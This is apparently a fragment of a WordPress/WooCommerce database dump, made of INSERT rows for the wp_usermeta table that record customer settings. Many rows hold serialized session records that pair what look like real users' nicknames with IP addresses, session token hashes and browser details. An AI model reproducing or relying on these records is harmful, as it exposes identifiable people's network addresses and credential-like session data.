INSERT INTO `wp_usermeta` VALUES (833, 35, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (834, 35, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (835, 35, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (836, 35, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (837, 35, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (838, 35, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (839, 35, 'last_update', '1475601247'); 
INSERT INTO `wp_usermeta` VALUES (840, 1, 'wp_statistics', 'a:2:{s:13:"dashboard_set";s:4:"10.3";s:10:"editor_set";s:4:"10.3";}'); 
INSERT INTO `wp_usermeta` VALUES (841, 1, 'metaboxhidden_dashboard', 'a:10:{i:0;s:29:"wp-statistics-browsers-widget";i:1;s:28:"wp-statistics-hitsmap-widget";i:2;s:25:"wp-statistics-hits-widget";i:3;s:26:"wp-statistics-pages-widget";i:4;s:27:"wp-statistics-recent-widget";i:5;s:30:"wp-statistics-referring-widget";i:6;s:27:"wp-statistics-search-widget";i:7;s:28:"wp-statistics-summary-widget";i:8;s:26:"wp-statistics-words-widget";i:9;s:33:"wp-statistics-top-visitors-widget";}'); 
INSERT INTO `wp_usermeta` VALUES (842, 1, 'metaboxhidden_post', 'a:1:{i:0;s:29:"wp_statistics_editor_meta_box";}'); 
INSERT INTO `wp_usermeta` VALUES (843, 2, 'wp_statistics', 'a:2:{s:13:"dashboard_set";s:4:"10.3";s:10:"editor_set";s:4:"10.3";}'); 
INSERT INTO `wp_usermeta` VALUES (844, 2, 'metaboxhidden_dashboard', 'a:0:{}'); 
INSERT INTO `wp_usermeta` VALUES (845, 2, 'closedpostboxes_toplevel_page_wps_overview_page', 'a:0:{}'); 
INSERT INTO `wp_usermeta` VALUES (846, 2, 'metaboxhidden_toplevel_page_wps_overview_page', 'a:0:{}'); 
INSERT INTO `wp_usermeta` VALUES (847, 2, 'metaboxhidden_post', 'a:0:{}'); 
INSERT INTO `wp_usermeta` VALUES (848, 2, 'metaboxhidden_page', 'a:1:{i:0;s:29:"wp_statistics_editor_meta_box";}'); 
INSERT INTO `wp_usermeta` VALUES (849, 37, 'nickname', 'nicholas.gurrisi'); 
INSERT INTO `wp_usermeta` VALUES (850, 37, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (851, 37, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (852, 37, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (853, 37, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (854, 37, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (855, 37, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (856, 37, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (857, 37, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (858, 37, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (859, 37, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (860, 37, '_yoast_wpseo_profile_updated', '1475672014'); 
INSERT INTO `wp_usermeta` VALUES (861, 37, 'session_tokens', 'a:1:{s:64:"fbca70bdcc99422acfb144cdfe8bb829dbc1243e128f14d11d3a88cd2ab3abd6";a:4:{s:10:"expiration";i:1476881614;s:2:"ip";s:14:"131.142.190.78";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1475672014;}}'); 
INSERT INTO `wp_usermeta` VALUES (862, 37, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (866, 38, 'nickname', 'mubetcel'); 
INSERT INTO `wp_usermeta` VALUES (867, 38, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (868, 38, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (869, 38, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (870, 38, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (871, 38, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (872, 38, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (873, 38, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (874, 38, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (875, 38, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (876, 38, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (877, 38, '_yoast_wpseo_profile_updated', '1475677218'); 
INSERT INTO `wp_usermeta` VALUES (878, 38, 'session_tokens', 'a:1:{s:64:"17a609bd8ada90bad849e389b69b314abe6d88162578565742c69d52885dba81";a:4:{s:10:"expiration";i:1476886819;s:2:"ip";s:14:"208.180.109.18";s:2:"ua";s:127:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586";s:5:"login";i:1475677219;}}'); 
INSERT INTO `wp_usermeta` VALUES (879, 38, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (880, 39, 'nickname', 'WMAROTTA'); 
INSERT INTO `wp_usermeta` VALUES (881, 39, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (882, 39, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (883, 39, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (884, 39, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (885, 39, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (886, 39, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (887, 39, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (888, 39, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (889, 39, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (890, 39, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (891, 39, '_yoast_wpseo_profile_updated', '1487011733'); 
INSERT INTO `wp_usermeta` VALUES (892, 39, 'session_tokens', 'a:1:{s:64:"5eb7f070592ba5245435f7ef4ba5ebc695dd75f43b6772a5aa5e61eb0654275c";a:4:{s:10:"expiration";i:1499520358;s:2:"ip";s:13:"198.0.163.158";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1499347558;}}'); 
INSERT INTO `wp_usermeta` VALUES (893, 40, 'nickname', 'darrel.ruby'); 
INSERT INTO `wp_usermeta` VALUES (894, 40, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (895, 40, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (896, 40, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (897, 40, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (898, 40, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (899, 40, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (900, 40, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (901, 40, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (902, 40, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (903, 40, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (904, 40, '_yoast_wpseo_profile_updated', '1475679361'); 
INSERT INTO `wp_usermeta` VALUES (905, 40, 'session_tokens', 'a:1:{s:64:"ef466c3ab5a916cca79b1056104d42433a35f5bc4dde4fb6071a4497725ac816";a:4:{s:10:"expiration";i:1476888961;s:2:"ip";s:13:"135.245.48.73";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1475679361;}}'); 
INSERT INTO `wp_usermeta` VALUES (906, 39, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (908, 3, 'wp_statistics', 'a:2:{s:10:"editor_set";s:4:"10.3";s:13:"dashboard_set";s:4:"10.3";}'); 
INSERT INTO `wp_usermeta` VALUES (909, 3, 'metaboxhidden_post', 'a:0:{}'); 
INSERT INTO `wp_usermeta` VALUES (910, 3, 'metaboxhidden_page', 'a:1:{i:0;s:29:"wp_statistics_editor_meta_box";}'); 
INSERT INTO `wp_usermeta` VALUES (911, 41, 'nickname', 'MAL'); 
INSERT INTO `wp_usermeta` VALUES (912, 41, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (913, 41, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (914, 41, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (915, 41, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (916, 41, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (917, 41, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (918, 41, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (919, 41, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (920, 41, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (921, 41, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (922, 41, '_yoast_wpseo_profile_updated', '1475682978'); 
INSERT INTO `wp_usermeta` VALUES (924, 41, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (925, 42, 'nickname', 'Charlie'); 
INSERT INTO `wp_usermeta` VALUES (926, 42, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (927, 42, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (928, 42, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (929, 42, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (930, 42, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (931, 42, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (932, 42, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (933, 42, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (934, 42, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (935, 42, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (936, 42, '_yoast_wpseo_profile_updated', '1475690589'); 
INSERT INTO `wp_usermeta` VALUES (937, 42, 'session_tokens', 'a:1:{s:64:"8d4af96efa5ce743ce279a7d358c01ccbf0a4958e69acab3a3f7c836b8f7849a";a:4:{s:10:"expiration";i:1476900189;s:2:"ip";s:14:"68.193.177.246";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1475690589;}}'); 
INSERT INTO `wp_usermeta` VALUES (938, 43, 'nickname', 'sue.emery'); 
INSERT INTO `wp_usermeta` VALUES (939, 43, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (940, 43, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (941, 43, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (942, 43, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (943, 43, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (944, 43, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (945, 43, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (946, 43, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (947, 43, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (948, 43, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (949, 43, '_yoast_wpseo_profile_updated', '1475691693'); 
INSERT INTO `wp_usermeta` VALUES (950, 43, 'session_tokens', 'a:1:{s:64:"cfa2f67b9d4bcc3d2977543c377f695885649768641c6ff631cf627a66585a23";a:4:{s:10:"expiration";i:1476901293;s:2:"ip";s:12:"65.121.242.8";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1475691693;}}'); 
INSERT INTO `wp_usermeta` VALUES (951, 43, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (953, 44, 'nickname', 'mariah.voskamp'); 
INSERT INTO `wp_usermeta` VALUES (954, 44, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (955, 44, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (956, 44, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (957, 44, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (958, 44, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (959, 44, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (960, 44, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (961, 44, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (962, 44, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (963, 44, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (964, 44, '_yoast_wpseo_profile_updated', '1475698882'); 
INSERT INTO `wp_usermeta` VALUES (965, 44, 'session_tokens', 'a:1:{s:64:"99c0cd177738c6457b43b44d50e44de22e1d259b2c3d48af5e863c5a4b994f05";a:4:{s:10:"expiration";i:1476908483;s:2:"ip";s:13:"166.20.224.12";s:2:"ua";s:178:"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)";s:5:"login";i:1475698883;}}'); 
INSERT INTO `wp_usermeta` VALUES (966, 44, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (967, 45, 'nickname', 'sam'); 
INSERT INTO `wp_usermeta` VALUES (968, 45, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (969, 45, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (970, 45, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (971, 45, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (972, 45, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (973, 45, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (974, 45, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (975, 45, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (976, 45, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (977, 45, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (978, 45, '_yoast_wpseo_profile_updated', '1475747094'); 
INSERT INTO `wp_usermeta` VALUES (979, 45, 'session_tokens', 'a:2:{s:64:"d181349544a9166dd205daf42b55add75f76341ac38a6003d8b49f2f9960ade5";a:4:{s:10:"expiration";i:1481265141;s:2:"ip";s:14:"111.93.191.254";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0";s:5:"login";i:1481092341;}s:64:"04f953efc37da4dd4d1fcc73018b8c0ec809f3f8196fbddb125c373436f6307e";a:4:{s:10:"expiration";i:1481281389;s:2:"ip";s:14:"111.93.191.254";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0";s:5:"login";i:1481108589;}}'); 
INSERT INTO `wp_usermeta` VALUES (980, 42, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (981, 2, 'closedpostboxes_post', 'a:0:{}'); 
INSERT INTO `wp_usermeta` VALUES (983, 46, 'nickname', 'matthew.kremer'); 
INSERT INTO `wp_usermeta` VALUES (984, 46, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (985, 46, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (986, 46, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (987, 46, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (988, 46, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (989, 46, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (990, 46, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (991, 46, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (992, 46, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (993, 46, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (994, 46, '_yoast_wpseo_profile_updated', '1475775534'); 
INSERT INTO `wp_usermeta` VALUES (995, 46, 'session_tokens', 'a:1:{s:64:"0db3d0744da6a2896665ef2a56955b82603fa34026d178bb405c2d8db007e107";a:4:{s:10:"expiration";i:1476985134;s:2:"ip";s:12:"74.93.67.217";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1475775534;}}'); 
INSERT INTO `wp_usermeta` VALUES (996, 46, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (997, 47, 'nickname', 'tanderson'); 
INSERT INTO `wp_usermeta` VALUES (998, 47, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (999, 47, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1000, 47, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1001, 47, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1002, 47, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1003, 47, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1004, 47, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1005, 47, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1006, 47, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1007, 47, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1008, 47, '_yoast_wpseo_profile_updated', '1475778166'); 
INSERT INTO `wp_usermeta` VALUES (1009, 47, 'session_tokens', 'a:1:{s:64:"6e48177b3b2b02612157f31a3e7bf41a7144650399ccdf370bcabb39aeee6835";a:4:{s:10:"expiration";i:1476987766;s:2:"ip";s:11:"96.95.83.60";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1475778166;}}'); 
INSERT INTO `wp_usermeta` VALUES (1010, 48, 'nickname', 'sbidwell'); 
INSERT INTO `wp_usermeta` VALUES (1011, 48, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1012, 48, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1013, 48, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1014, 48, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1015, 48, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1016, 48, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1017, 48, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1018, 48, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1019, 48, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1020, 48, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1021, 48, '_yoast_wpseo_profile_updated', '1475778183'); 
INSERT INTO `wp_usermeta` VALUES (1022, 48, 'session_tokens', 'a:1:{s:64:"70d17e09728d4b9a35078e94b0b862c71dbb5ed894f55363f3124e8244c02236";a:4:{s:10:"expiration";i:1476987783;s:2:"ip";s:14:"72.241.197.110";s:2:"ua";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1475778183;}}'); 
INSERT INTO `wp_usermeta` VALUES (1023, 47, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1024, 48, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1028, 49, 'nickname', 'Anna.Pratt'); 
INSERT INTO `wp_usermeta` VALUES (1029, 49, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1030, 49, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1031, 49, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1032, 49, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1033, 49, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1034, 49, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1035, 49, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1036, 49, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1037, 49, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1038, 49, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1039, 49, '_yoast_wpseo_profile_updated', '1475783029'); 
INSERT INTO `wp_usermeta` VALUES (1040, 49, 'session_tokens', 'a:1:{s:64:"94b81462da020abe7079a411a1d03a91f4178e164cde520a1a460fb9fd100601";a:4:{s:10:"expiration";i:1476992630;s:2:"ip";s:14:"152.132.10.250";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1475783030;}}'); 
INSERT INTO `wp_usermeta` VALUES (1041, 49, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1044, 50, 'nickname', 'jfrancisco'); 
INSERT INTO `wp_usermeta` VALUES (1045, 50, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1046, 50, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1047, 50, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1048, 50, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1049, 50, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1050, 50, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1051, 50, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1052, 50, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1053, 50, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1054, 50, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1055, 50, '_yoast_wpseo_profile_updated', '1475842772'); 
INSERT INTO `wp_usermeta` VALUES (1056, 50, 'session_tokens', 'a:1:{s:64:"67525d2fc833afe836d112319bf40225f1b2925d6e7ad38241e92e88cb5d93d5";a:4:{s:10:"expiration";i:1477052372;s:2:"ip";s:13:"67.76.111.174";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1475842772;}}'); 
INSERT INTO `wp_usermeta` VALUES (1057, 50, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1061, 51, 'nickname', 'jboyd'); 
INSERT INTO `wp_usermeta` VALUES (1062, 51, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1063, 51, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1064, 51, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1065, 51, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1066, 51, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1067, 51, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1068, 51, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1069, 51, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1070, 51, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1071, 51, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1072, 51, '_yoast_wpseo_profile_updated', '1475852142'); 
INSERT INTO `wp_usermeta` VALUES (1073, 51, 'session_tokens', 'a:1:{s:64:"d0f2c7c43ebe15f7bb14e477259ae3c17d2cf7bb5db7d201d4c3eef4bf387fad";a:4:{s:10:"expiration";i:1477061743;s:2:"ip";s:14:"141.189.251.16";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1475852143;}}'); 
INSERT INTO `wp_usermeta` VALUES (1074, 51, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1075, 52, 'nickname', 'clayton.garrett'); 
INSERT INTO `wp_usermeta` VALUES (1076, 52, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1077, 52, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1078, 52, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1079, 52, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1080, 52, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1081, 52, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1082, 52, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1083, 52, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1084, 52, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1085, 52, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1086, 52, '_yoast_wpseo_profile_updated', '1475853026'); 
INSERT INTO `wp_usermeta` VALUES (1088, 53, 'nickname', 'eric.putnam'); 
INSERT INTO `wp_usermeta` VALUES (1089, 53, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1090, 53, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1091, 53, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1092, 53, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1093, 53, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1094, 53, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1095, 53, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1096, 53, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1097, 53, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1098, 53, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1099, 53, '_yoast_wpseo_profile_updated', '1475859665'); 
INSERT INTO `wp_usermeta` VALUES (1100, 53, 'session_tokens', 'a:1:{s:64:"b2d040450e106b9581e20c0122494e823dba1bd6c6339d04cfe3f81f15547fb8";a:4:{s:10:"expiration";i:1477069266;s:2:"ip";s:11:"4.34.94.123";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1475859666;}}'); 
INSERT INTO `wp_usermeta` VALUES (1101, 53, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1102, 54, 'nickname', 'richardsc'); 
INSERT INTO `wp_usermeta` VALUES (1103, 54, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1104, 54, 'last_name', ''); 
